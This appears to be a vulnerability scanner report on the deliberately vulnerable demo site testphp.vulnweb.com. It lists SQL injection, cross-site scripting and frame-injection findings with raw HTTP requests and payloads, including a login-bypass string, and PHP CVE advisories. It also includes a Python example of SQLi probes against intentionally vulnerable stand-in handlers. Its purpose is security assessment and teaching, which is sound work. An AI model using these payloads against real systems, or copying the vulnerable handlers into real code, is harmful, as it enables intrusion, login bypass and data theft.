CONFIRMED | SEVERITY | VULNERABILITY | METHOD | URL | PARAMETER | PARAMETER TYPE |
---|---|---|---|---|---|---|
Unconfirmed | Critical | [Probable] SQL Injection | POST | http://testphp.vulnweb.com/cart.php | addcart | Post |
Unconfirmed | Critical | [Probable] SQL Injection | GET | http://testphp.vulnweb.com/search.php?test=%27%2b%20(select%20convert(int%2c%20cast(0x5f21403264696c656d6d61%20as%20varchar(8000)))%20from%20syscolumns)%20%2b%27 | test | Querystring |
Unconfirmed | Critical | [Probable] SQL Injection | POST | http://testphp.vulnweb.com/search.php?test=%27%2b%20(select%20convert(int%2c%20cast(0x5f21403264696c656d6d61%20as%20varchar(8000)))%20from%20syscolumns)%20%2b%27 | test | Querystring |
Unconfirmed | Critical | Out-of-date Version (PHP) | GET | http://testphp.vulnweb.com/ | | |
Confirmed | Critical | Boolean Based SQL Injection | GET | http://testphp.vulnweb.com/artists.php?artist=1%20OR%2017-7%3d10 | artist | Querystring |
Confirmed | Critical | Boolean Based SQL Injection | GET | http://testphp.vulnweb.com/listproducts.php?artist=2%20OR%2017-7%3d10 | artist | Querystring |
Confirmed | Critical | Boolean Based SQL Injection | GET | http://testphp.vulnweb.com/listproducts.php?cat=1%20OR%2017-7%3d10 | cat | Querystring |
Confirmed | Critical | Boolean Based SQL Injection | GET | http://testphp.vulnweb.com/product.php?pic=1%20OR%2017-7%3d10 | pic | Querystring |
Confirmed | Critical | Boolean Based SQL Injection | POST | http://testphp.vulnweb.com/secured/newuser.php | uuname | Post |
Confirmed | Critical | Boolean Based SQL Injection | POST | http://testphp.vulnweb.com/userinfo.php | pass | Post |
Confirmed | Critical | Boolean Based SQL Injection | POST | http://testphp.vulnweb.com/userinfo.php | uname | Post |
Unconfirmed | High | [Probable] Local File Inclusion | GET | http://testphp.vulnweb.com/showimage.php?file=data%3a%3bbase64%2cTlM3NzU0NTYxNDQ2NTc1&size=160 | file | Querystring |
Unconfirmed | High | Out-of-date Version (Nginx) | GET | http://testphp.vulnweb.com/ | | |
Confirmed | High | Cross-site Scripting | POST | http://testphp.vulnweb.com/comment.php | name | Post |
Confirmed | High | Cross-site Scripting | POST | http://testphp.vulnweb.com/guestbook.php | text | Post |
Confirmed | High | Cross-site Scripting | POST | http://testphp.vulnweb.com/guestbook.php | name | Post |
Confirmed | High | Cross-site Scripting | GET | http://testphp.vulnweb.com/hpp/?pp=x%22%20onmouseover%3dnetsparker(0x003049)%20x%3d%22 | pp | Querystring |
Confirmed | High | Cross-site Scripting | GET | http://testphp.vulnweb.com/hpp/params.php?aaaa%2f=&p=%3cscRipt%3enetsparker(0x004FDC)%3c%2fscRipt%3e&pp=12 | p | Querystring |
Confirmed | High | Cross-site Scripting | GET | http://testphp.vulnweb.com/hpp/params.php?aaaa%2f=&p=valid&pp=%3cscRipt%3enetsparker(0x004FDE)%3c%2fscRipt%3e | pp | Querystring |
Confirmed | High | Cross-site Scripting | GET | http://testphp.vulnweb.com/listproducts.php?artist=%3cscRipt%3enetsparker(0x00437A)%3c%2fscRipt%3e | artist | Querystring |
Confirmed | High | Cross-site Scripting | GET | http://testphp.vulnweb.com/listproducts.php?cat=%3cscRipt%3enetsparker(0x001FDA)%3c%2fscRipt%3e | cat | Querystring |
Confirmed | High | Cross-site Scripting | POST | http://testphp.vulnweb.com/search.php?test=query | searchFor | Post |
Confirmed | High | Cross-site Scripting | POST | http://testphp.vulnweb.com/secured/newuser.php | uuname | Post |
Confirmed | High | Cross-site Scripting | POST | http://testphp.vulnweb.com/secured/newuser.php | urname | Post |
Confirmed | High | Cross-site Scripting | POST | http://testphp.vulnweb.com/secured/newuser.php | uemail | Post |
Confirmed | High | Cross-site Scripting | POST | http://testphp.vulnweb.com/secured/newuser.php | ucc | Post |
Confirmed | High | Cross-site Scripting | POST | http://testphp.vulnweb.com/secured/newuser.php | uphone | Post |
Confirmed | High | Cross-site Scripting | POST | http://testphp.vulnweb.com/secured/newuser.php | uaddress | Post |
Confirmed | High | Out-of-date Component (class.upload.php) | GET | http://testphp.vulnweb.com/ | | |
Confirmed | High | Out-of-date Component (phpmailer) | GET | http://testphp.vulnweb.com/ | | |
Confirmed | High | Out-of-date Component (phpunit) | GET | http://testphp.vulnweb.com/ | | |
Confirmed | High | Out-of-date Component (smarty) | GET | http://testphp.vulnweb.com/ | | |
Confirmed | High | Password Transmitted over HTTP | GET | http://testphp.vulnweb.com/login.php | | |
Unconfirmed | Medium | [Possible] Cross-site Scripting | GET | http://testphp.vulnweb.com/showimage.php?file='%22--%3E%3C/style%3E%3C/scRipt%3E%3CscRipt%3Enetsparker(0x002932)%3C/scRipt%3E&size=160 | file | Querystring |
Unconfirmed | Medium | Frame Injection | GET | http://testphp.vulnweb.com/showimage.php?file=%3ciframe%20src%3d%22http%3a%2f%2fr87.com%2f%3f%22%3e%3c%2fiframe%3e&size=160 | file | Querystring |
Unconfirmed | Medium | JetBrains .idea Project Directory Detected | GET | http://testphp.vulnweb.com/.idea/workspace.xml | | |
Unconfirmed | Medium | PHP session.use_only_cookies Is Disabled | GET | http://testphp.vulnweb.com/secured/phpinfo.php | | |
Unconfirmed | Medium | SSL/TLS Not Implemented | GET | https://testphp.vulnweb.com/ | | |
Confirmed | Medium | Frame Injection | GET | http://testphp.vulnweb.com/hpp/params.php?aaaa%2f=&p=%3ciframe%20src%3d%22http%3a%2f%2fr87.com%2f%3f%22%3e%3c%2fiframe%3e&pp=12 | p | Querystring |
Confirmed | Medium | Frame Injection | GET | http://testphp.vulnweb.com/hpp/params.php?aaaa%2f=&p=valid&pp=%3ciframe%20src%3d%22http%3a%2f%2fr87.com%2f%3f%22%3e%3c%2fiframe%3e | pp | Querystring |
Confirmed | Medium | Frame Injection | GET | http://testphp.vulnweb.com/listproducts.php?artist=%3ciframe%20src%3d%22http%3a%2f%2fr87.com%2f%3f%22%3e%3c%2fiframe%3e | artist | Querystring |
Confirmed | Medium | Frame Injection | GET | http://testphp.vulnweb.com/listproducts.php?cat=%3ciframe%20src%3d%22http%3a%2f%2fr87.com%2f%3f%22%3e%3c%2fiframe%3e | cat | Querystring |
Confirmed | Medium | Open Policy Crossdomain.xml Detected | GET | http://testphp.vulnweb.com/crossdomain.xml | | |
Confirmed | Medium | Out-of-date Component (tinymce) | GET | http://testphp.vulnweb.com/ | | |
Unconfirmed | Low | [Possible] Cross-site Request Forgery | GET | http://testphp.vulnweb.com/guestbook.php | | |
Unconfirmed | Low | [Possible] Cross-site Request Forgery in Login Form | GET | http://testphp.vulnweb.com/login.php | | |
Unconfirmed | Low | [Possible] Insecure Reflected Content | GET | http://testphp.vulnweb.com/hpp/params.php?aaaa%2f=&p=N3tSp4rK3R&pp=12 | p | Querystring |
Unconfirmed | Low | [Possible] Internal IP Address Disclosure | GET | http://testphp.vulnweb.com/secured/phpinfo.php | | |
Unconfirmed | Low | [Possible] Phishing by Navigating Browser Tabs | GET | http://testphp.vulnweb.com/disclaimer.php | | |
Unconfirmed | Low | Database Error Message Disclosure | GET | http://testphp.vulnweb.com/search.php?test=%27%20WAITFOR%20DELAY%20%270%3a0%3a25%27--%20%2f*%204ba992a8-9bcd-4b9a-bbee-8b7a829e2e38%20*%2f | | |
Unconfirmed | Low | Missing X-Content-Type-Options Header | GET | http://testphp.vulnweb.com/ | | |
Unconfirmed | Low | phpinfo() Output Detected | GET | http://testphp.vulnweb.com/secured/phpinfo.php | | |
Unconfirmed | Low | Version Disclosure (Nginx) | GET | http://testphp.vulnweb.com/ | | |
Unconfirmed | Low | Version Disclosure (PHP) | GET | http://testphp.vulnweb.com/ | | |
Confirmed | Low | Cookie Not Marked as HttpOnly | GET | http://testphp.vulnweb.com/AJAX/ | | |
Unconfirmed | Best Practice | Referrer-Policy Not Implemented | GET | http://testphp.vulnweb.com/ | | |
Unconfirmed | Best Practice | SameSite Cookie Not Implemented | GET | http://testphp.vulnweb.com/AJAX/ | | |
Confirmed | Best Practice | Content Security Policy (CSP) Not Implemented | GET | http://testphp.vulnweb.com/ | | |
Unconfirmed | Information | .htaccess File Detected | GET | http://testphp.vulnweb.com/Mod_Rewrite_Shop/.htaccess | | |
Unconfirmed | Information | [Possible] Login Page Identified | GET | http://testphp.vulnweb.com/login.php | | |
Unconfirmed | Information | [Possible] SQL File Detected | GET | http://testphp.vulnweb.com/admin/create.sql | | |
Unconfirmed | Information | Email Address Disclosure | GET | http://testphp.vulnweb.com/ | | |
Unconfirmed | Information | Nginx Web Server Identified | GET | http://testphp.vulnweb.com/ | | |
Unconfirmed | Information | PHP Identified | GET | http://testphp.vulnweb.com/ | | |
Unconfirmed | Information | Unexpected Redirect Response Body (Too Large) | GET | http://testphp.vulnweb.com/comment.php | | |
Confirmed | Information | Autocomplete Enabled (Password Field) | GET | http://testphp.vulnweb.com/login.php | | |
Confirmed | Information | Database Detected (MySQL) | GET | http://testphp.vulnweb.com/listproducts.php?cat=-1%20OR%201%3d1%20AND%20IFNULL(ASCII(SUBSTRING((SELECT%200x4E4554535041524B4552)%2c9%2c1))%2c0)%3d82--%20 | | |
Confirmed | Information | Forbidden Resource | POST | http://testphp.vulnweb.com/images/ | | |
Invicti Standard identified a Probable SQL Injection, which occurs when data input by a user is interpreted as an SQL command rather than as normal data by the backend database.
This is an extremely common vulnerability and its successful exploitation can have critical implications.
Even though Invicti Standard believes there is a SQL injection here, it could not confirm it. There can be numerous reasons for Invicti Standard not being able to confirm this. We strongly recommend investigating the issue manually to ensure it is an SQL injection and that it needs to be addressed. You can also consider sending the details of this issue to us so we can address it next time and give you a more precise result.
A note on the evidence below before you start that manual check. The search.php payload is a T-SQL error-based probe: convert(int, cast(0x5f21403264696c656d6d61 as varchar(8000))) from syscolumns asks Microsoft SQL Server to convert the marker string _!@2dilemma (the hex literal decoded) to an integer, which fails with a conversion error that echoes the marker. The summary above records the backend as MySQL (Database Detected (MySQL)), where syscolumns and convert() are simply a syntax error, and the cart.php payload is a bare single quote (%27). What triggered the Probable rating is therefore a database error message in the response, not an executed query; a MySQL-specific boolean or time-based test on the same parameters is the quickest way to settle it.
Method | Parameter | Parameter Type | Value |
---|---|---|---|
POST | price | Post | 500 |
POST | addcart | Post | %27 |
POST /cart.php HTTP/1.1
Host: testphp.vulnweb.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-us,en;q=0.5
Cache-Control: no-cache
Content-Length: 23
Content-Type: application/x-www-form-urlencoded
Cookie: login=test%2Ftest
Referer: http://testphp.vulnweb.com/product.php?pic=1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.71 Safari/537.36
price=500&addcart=%2527
Method | Parameter | Parameter Type | Value |
---|---|---|---|
GET | test | Querystring | '+ (select convert(int, cast(0x5f21403264696c656d6d61 as varchar(8000))) from syscolumns) +' |
GET /search.php?test=%27%2b%20(select%20convert(int%2c%20cast(0x5f21403264696c656d6d61%20as%20varchar(8000)))%20from%20syscolumns)%20%2b%27 HTTP/1.1
Host: testphp.vulnweb.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-us,en;q=0.5
Cache-Control: no-cache
Referer: http://testphp.vulnweb.com/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.71 Safari/537.36
Method | Parameter | Parameter Type | Value |
---|---|---|---|
POST | searchFor | Post | |
POST | goButton | Post | go |
POST | test | Querystring | '+ (select convert(int, cast(0x5f21403264696c656d6d61 as varchar(8000))) from syscolumns) +' |
POST /search.php?test=%27%2b%20(select%20convert(int%2c%20cast(0x5f21403264696c656d6d61%20as%20varchar(8000)))%20from%20syscolumns)%20%2b%27 HTTP/1.1
Host: testphp.vulnweb.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-us,en;q=0.5
Cache-Control: no-cache
Content-Length: 22
Content-Type: application/x-www-form-urlencoded
Referer: http://testphp.vulnweb.com/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.71 Safari/537.36
searchFor=&goButton=go
Classification | Reference |
---|---|
PCI DSS v3.2 | 6.5.1 |
PCI DSS v4.0 | 6.2.4 |
OWASP 2013 | A1 |
OWASP 2017 | A1 |
CWE | 89 |
CAPEC | 66 |
WASC | 19 |
HIPAA | 164.306(a), 164.308(a) |
ASVS 4.0 | 5.3.4 |
NIST SP 800-53 | SI-10 |
DISA STIG | V-16807 |
OWASP API Top Ten 2019 | API8 |
ISO27001 | A.14.2.5 |
ISO27001 2022 | A.8.26, A.8.27, A.8.28 |
OWASP Top Ten 2021 | A03 |
CVSS 3.0 | Score |
---|---|
Base | 10 (Critical) |
Temporal | 10 (Critical) |
Environmental | 10 (Critical) |
Vector | CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H |

CVSS 3.1 | Score |
---|---|
Base | 10 (Critical) |
Temporal | 10 (Critical) |
Environmental | 10 (Critical) |
Vector | CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H |

CVSS 4.0 | Score |
---|---|
Overall | 9.3 (Critical) |
Exploitability | High |
Complexity | High |
Vulnerable system | High |
Subsequent system | Low |
Exploitation | High |
Security requirements | High |
Vector | CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N |
Invicti Standard identified a Boolean-Based SQL Injection, which occurs when data input by a user is interpreted as a SQL command rather than as normal data by the backend database.
This is an extremely common vulnerability and its successful exploitation can have critical implications.
Invicti Standard confirmed the vulnerability by executing a test SQL query on the backend database. In these tests, SQL injection was not obvious, but the different responses from the page based on the injection test allowed Invicti Standard to identify and confirm the SQL injection.
How to read the payloads below: 1 OR 17-7=10 is an arithmetically true condition, and the check rests on the page responding differently to that condition than to its false counterpart while the original request and the true case look alike, which can only happen if the database evaluated the injected expression. In the string-context payload -1' OR 1=1 OR 'ns'='ns, the leading quote closes the application's own string literal and the trailing 'ns'='ns re-balances the quote so the statement stays syntactically valid; against userinfo.php that is also a straightforward login bypass.
Method | Parameter | Parameter Type | Value |
---|---|---|---|
GET | artist | Querystring | 1 OR 17-7=10 |
GET /artists.php?artist=1%20OR%2017-7%3d10 HTTP/1.1
Host: testphp.vulnweb.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-us,en;q=0.5
Cache-Control: no-cache
Referer: http://testphp.vulnweb.com/artists.php
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.71 Safari/537.36
Method | Parameter | Parameter Type | Value |
---|---|---|---|
GET | artist | Querystring | 2 OR 17-7=10 |
GET /listproducts.php?artist=2%20OR%2017-7%3d10 HTTP/1.1
Host: testphp.vulnweb.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-us,en;q=0.5
Cache-Control: no-cache
Cookie: login=test%2Ftest
Referer: http://testphp.vulnweb.com/artists.php?artist=2
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.71 Safari/537.36
Method | Parameter | Parameter Type | Value |
---|---|---|---|
GET | cat | Querystring | 1 OR 17-7=10 |
GET /listproducts.php?cat=1%20OR%2017-7%3d10 HTTP/1.1
Host: testphp.vulnweb.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-us,en;q=0.5
Cache-Control: no-cache
Referer: http://testphp.vulnweb.com/categories.php
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.71 Safari/537.36
Method | Parameter | Parameter Type | Value |
---|---|---|---|
GET | pic | Querystring | 1 OR 17-7=10 |
GET /product.php?pic=1%20OR%2017-7%3d10 HTTP/1.1
Host: testphp.vulnweb.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-us,en;q=0.5
Cache-Control: no-cache
Cookie: login=test%2Ftest
Referer: http://testphp.vulnweb.com/search.php?test=query
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.71 Safari/537.36
Method | Parameter | Parameter Type | Value |
---|---|---|---|
POST | uaddress | Post | 3 |
POST | signup | Post | signup |
POST | uphone | Post | 3 |
POST | urname | Post | Smith |
POST | ucc | Post | 4916613944329494 |
POST | uemail | Post | netsparker@example.com |
POST | upass | Post | N3tsp@rker- |
POST | upass2 | Post | N3tsp@rker- |
POST | uuname | Post | -1' OR 1=1 OR 'ns'='ns |
POST /secured/newuser.php HTTP/1.1
Host: testphp.vulnweb.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-us,en;q=0.5
Cache-Control: no-cache
Content-Length: 182
Content-Type: application/x-www-form-urlencoded
Cookie: login=test%2Ftest
Referer: http://testphp.vulnweb.com/signup.php
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.71 Safari/537.36
uemail=netsparker%40example.com&uaddress=3&ucc=4916613944329494&upass2=N3tsp%40rker-&uuname=-1%27+OR+1%3d1+OR+%27ns%27%3d%27ns&upass=N3tsp%40rker-&uphone=3&urname=Smith&signup=signup
Method | Parameter | Parameter Type | Value |
---|---|---|---|
POST | pass | Post | -1' OR 1=1 OR 'ns'='ns |
POST | uname | Post | Smith |
POST /userinfo.php HTTP/1.1
Host: testphp.vulnweb.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-us,en;q=0.5
Cache-Control: no-cache
Content-Length: 51
Content-Type: application/x-www-form-urlencoded
Referer: http://testphp.vulnweb.com/login.php
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.71 Safari/537.36
pass=-1%27+OR+1%3d1+OR+%27ns%27%3d%27ns&uname=Smith
Method | Parameter | Parameter Type | Value |
---|---|---|---|
POST | pass | Post | N3tsp@rker- |
POST | uname | Post | -1' OR 1=1 OR 'ns'='ns |
POST /userinfo.php HTTP/1.1
Host: testphp.vulnweb.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-us,en;q=0.5
Cache-Control: no-cache
Content-Length: 59
Content-Type: application/x-www-form-urlencoded
Cookie: login=test%2Ftest
Referer: http://testphp.vulnweb.com/login.php
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.71 Safari/537.36
pass=N3tsp%40rker-&uname=-1%27+OR+1%3d1+OR+%27ns%27%3d%27ns
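The two checks behind the Probable SQL Injection finding above (the single-quote probe and the error-message match) and the boolean comparison behind the confirmed findings, as an added example. This is not Invicti's code and not the target application's source: the in-memory SQLite schema, its rows and the two page handlers are constructed stand-ins for listproducts.php?cat= (numeric context) and userinfo.php (uname/pass, string context), written once in the vulnerable form and once with bound parameters so the probes have something to distinguish.

```python
"""Error-based and boolean-based SQL injection probes against a constructed
SQLite stand-in for the pages in this report. Added example; not Invicti's
code and not the testphp.vulnweb.com source."""
import sqlite3

DB = sqlite3.connect(":memory:")
DB.executescript("""
    CREATE TABLE products (id INTEGER, cat INTEGER, name TEXT);
    INSERT INTO products VALUES (1, 1, 'poster'), (2, 1, 'print'), (3, 2, 'mug');
    CREATE TABLE users (uname TEXT, pass TEXT);
    INSERT INTO users VALUES ('test', 'test'), ('Smith', 's3cret');
""")

# The T-SQL probe in the Probable finding makes MSSQL echo this marker inside a
# conversion error; on MySQL or SQLite the same payload is only a syntax error.
MSSQL_MARKER = bytes.fromhex("5f21403264696c656d6d61").decode()   # "_!@2dilemma"
ERROR_SIGNATURES = {
    "mssql": ["Conversion failed when converting", "Unclosed quotation mark"],
    "mysql": ["You have an error in your SQL syntax"],
    "sqlite": ["unrecognized token", "syntax error"],
}


def listproducts_vulnerable(cat):
    """Numeric context; the parameter is concatenated into the statement."""
    try:
        rows = DB.execute(f"SELECT name FROM products WHERE cat={cat}").fetchall()
    except sqlite3.Error as e:
        return f"Error: {e}"            # the DB error reaches the response body
    return "\n".join(name for (name,) in rows)


def listproducts_safe(cat):
    """Same page with type enforcement plus a bound parameter."""
    if not cat.isdigit():
        return "Error: invalid category"
    rows = DB.execute("SELECT name FROM products WHERE cat=?", (int(cat),)).fetchall()
    return "\n".join(name for (name,) in rows)


def login_vulnerable(uname, pw):
    """String context; quotes are the only boundary between data and code."""
    q = f"SELECT uname FROM users WHERE uname='{uname}' AND pass='{pw}'"
    try:
        row = DB.execute(q).fetchone()
    except sqlite3.Error as e:
        return f"Error: {e}"
    return f"Welcome {row[0]}" if row else "Login failed"


def login_safe(uname, pw):
    row = DB.execute("SELECT uname FROM users WHERE uname=? AND pass=?",
                     (uname, pw)).fetchone()
    return f"Welcome {row[0]}" if row else "Login failed"


def error_probe(page, value):
    """Single-quote probe (the %27 sent to cart.php). Returns the DBMS whose
    error text appears, or None. Enough for a Probable rating, not for a
    confirmation: an error message proves breakage, not query execution."""
    body = page(value + "'")
    for dbms, sigs in ERROR_SIGNATURES.items():
        if any(sig in body for sig in sigs):
            return dbms
    return None


def boolean_probe_numeric(page, value):
    """17-7=10 is true, 17-7=11 is false. Vulnerable if the true case leaves
    the page unchanged while the false case changes it, with no error text."""
    original = page(value)
    true_case = page(f"{value} AND 17-7=10")
    false_case = page(f"{value} AND 17-7=11")
    if "Error" in true_case or "Error" in false_case:
        return False
    return original == true_case and true_case != false_case


def boolean_probe_string(page, value):
    """String-context variant in the report's -1' OR 1=1 OR 'ns'='ns shape;
    the trailing 'ns'='ns re-balances the quote the payload opened."""
    true_case = page(f"{value}' OR 1=1 OR 'ns'='ns")
    false_case = page(f"{value}' OR 1=2 OR 'ns'='nt")
    if "Error" in true_case or "Error" in false_case:
        return False
    return true_case != false_case


if __name__ == "__main__":
    print("cat error probe:", error_probe(listproducts_vulnerable, "1"))
    print("cat boolean:", boolean_probe_numeric(listproducts_vulnerable, "1"),
          boolean_probe_numeric(listproducts_safe, "1"))
    print("uname boolean:",
          boolean_probe_string(lambda u: login_vulnerable(u, "x"), "-1"),
          boolean_probe_string(lambda u: login_safe(u, "x"), "-1"))
```

The boolean probe is the one worth keeping in your own regression checks: it needs no error output from the application, so it keeps working after someone "fixes" the finding by hiding database errors, and it fails cleanly against the parameterised handlers because the true case no longer matches the original response.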
Classification | Reference |
---|---|
PCI DSS v3.2 | 6.5.1 |
PCI DSS v4.0 | 6.2.4 |
OWASP 2013 | A1 |
OWASP 2017 | A1 |
CWE | 89 |
CAPEC | 66 |
WASC | 19 |
HIPAA | 164.306(a), 164.308(a) |
ASVS 4.0 | 5.3.4 |
NIST SP 800-53 | SI-10 |
DISA STIG | V-16807 |
OWASP API Top Ten 2019 | API8 |
ISO27001 | A.14.2.5 |
ISO27001 2022 | A.8.26, A.8.27, A.8.28 |
OWASP Top Ten 2021 | A03 |
CVSS 3.0 | Score |
---|---|
Base | 10 (Critical) |
Temporal | 10 (Critical) |
Environmental | 10 (Critical) |
Vector | CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H |

CVSS 3.1 | Score |
---|---|
Base | 10 (Critical) |
Temporal | 10 (Critical) |
Environmental | 10 (Critical) |
Vector | CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H |

CVSS 4.0 | Score |
---|---|
Overall | 9.3 (Critical) |
Exploitability | High |
Complexity | High |
Vulnerable system | High |
Subsequent system | Low |
Exploitation | High |
Security requirements | High |
Vector | CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N |
Invicti Standard identified that you are using an out-of-date version of PHP. Each advisory below is followed by its CVSS vector. The list spans fixes from the 7.0 branch up to 8.1.11 and 8.2.12, so not every entry applies to a single installed version: compare the exact version disclosed by the server (Version Disclosure (PHP) in the summary above) against each advisory's affected range before prioritising.
Double free vulnerability in the format printer in PHP 7.x before 7.0.1 allows remote attackers to have an unspecified impact by triggering an error.
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Multiple integer overflows in php_zip.c in the zip extension in PHP before 7.0.6 allow remote attackers to cause a denial of service (heap-based buffer overflow and application crash) or possibly have unspecified other impact via a crafted call to (1) getFromIndex or (2) getFromName in the ZipArchive class.
CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Integer overflow in the xml_utf8_encode function in ext/xml/xml.c in PHP before 7.0.4 allows remote attackers to cause a denial of service or possibly have unspecified other impact via a long argument to the utf8_encode function, leading to a heap-based buffer overflow.
CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Integer overflow in the php_filter_encode_url function in ext/filter/sanitizing_filters.c in PHP before 7.0.4 allows remote attackers to cause a denial of service or possibly have unspecified other impact via a long string, leading to a heap-based buffer overflow.
CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Integer overflow in the str_pad function in ext/standard/string.c in PHP before 7.0.4 allows remote attackers to cause a denial of service or possibly have unspecified other impact via a long string, leading to a heap-based buffer overflow.
CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
An issue was discovered in the EXIF component in PHP before 7.1.27, 7.2.x before 7.2.16, and 7.3.x before 7.3.3. There is an uninitialized read in exif_process_IFD_in_TIFF.
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
The SplObjectStorage unserialize implementation in ext/spl/spl_observer.c in PHP before 7.0.12 does not verify that a key is an object, which allows remote attackers to execute arbitrary code or cause a denial of service (uninitialized memory access) via crafted serialized data.
CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
The zend_string_extend function in Zend/zend_string.h in PHP through 7.1.5 does not prevent changes to string objects that result in a negative length, which allows remote attackers to cause a denial of service (application crash) or possibly have unspecified other impact by leveraging a script's use of .= with a long string.
CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
In PHP versions prior to 7.4.33, 8.0.25 and 8.2.12, when using imageloadfont() function in gd extension, it is possible to supply a specially crafted font file, such as if the loaded font is used with imagechar() function, the read outside allocated buffer will be used. This can lead to crashes or disclosure of confidential information.
CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:H
PHP through 7.0.8 does not attempt to address RFC 3875 section 4.1.18 namespace conflicts and therefore does not protect applications from the presence of untrusted client data in the HTTP_PROXY environment variable, which might allow remote attackers to redirect an application's outbound HTTP traffic to an arbitrary proxy server via a crafted Proxy header in an HTTP request, as demonstrated by (1) an application that makes a getenv('HTTP_PROXY') call or (2) a CGI configuration of PHP, aka an "httpoxy" issue.
CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
An issue was discovered in PHP before 7.1.27, 7.2.x before 7.2.16, and 7.3.x before 7.3.3. Due to the way rename() across filesystems is implemented, it is possible that file being renamed is briefly available with wrong permissions while the rename is ongoing, thus enabling unauthorized users to access the data.
CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
An issue was discovered in the EXIF component in PHP before 7.1.27, 7.2.x before 7.2.16, and 7.3.x before 7.3.3. There is an uninitialized read in exif_process_IFD_in_MAKERNOTE because of mishandling the maker_note->offset relationship to value_len.
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
An issue was discovered in the EXIF component in PHP before 7.1.27, 7.2.x before 7.2.16, and 7.3.x before 7.3.3. There is an uninitialized read in exif_process_IFD_in_MAKERNOTE because of mishandling the data_len variable.
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
ext/standard/var.c in PHP 5.x through 7.1.24 on Windows allows attackers to cause a denial of service (NULL pointer dereference and application crash) because com and com_safearray_proxy return NULL in com_properties_get in ext/com_dotnet/com_handlers.c, as demonstrated by a serialize call on COM("WScript.Shell").
CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
ext/standard/var_unserializer.c in PHP 5.x through 7.1.24 allows attackers to cause a denial of service (application crash) via an unserialize call for the com, dotnet, or variant class.
CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
PHP through 7.1.11 enables potential SSRF in applications that accept an fsockopen or pfsockopen hostname argument with an expectation that the port number is constrained. Because a :port syntax is recognized, fsockopen will use the port number that is specified in the hostname argument, instead of the port number in the second argument of the function.
CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:N/I:H/A:N
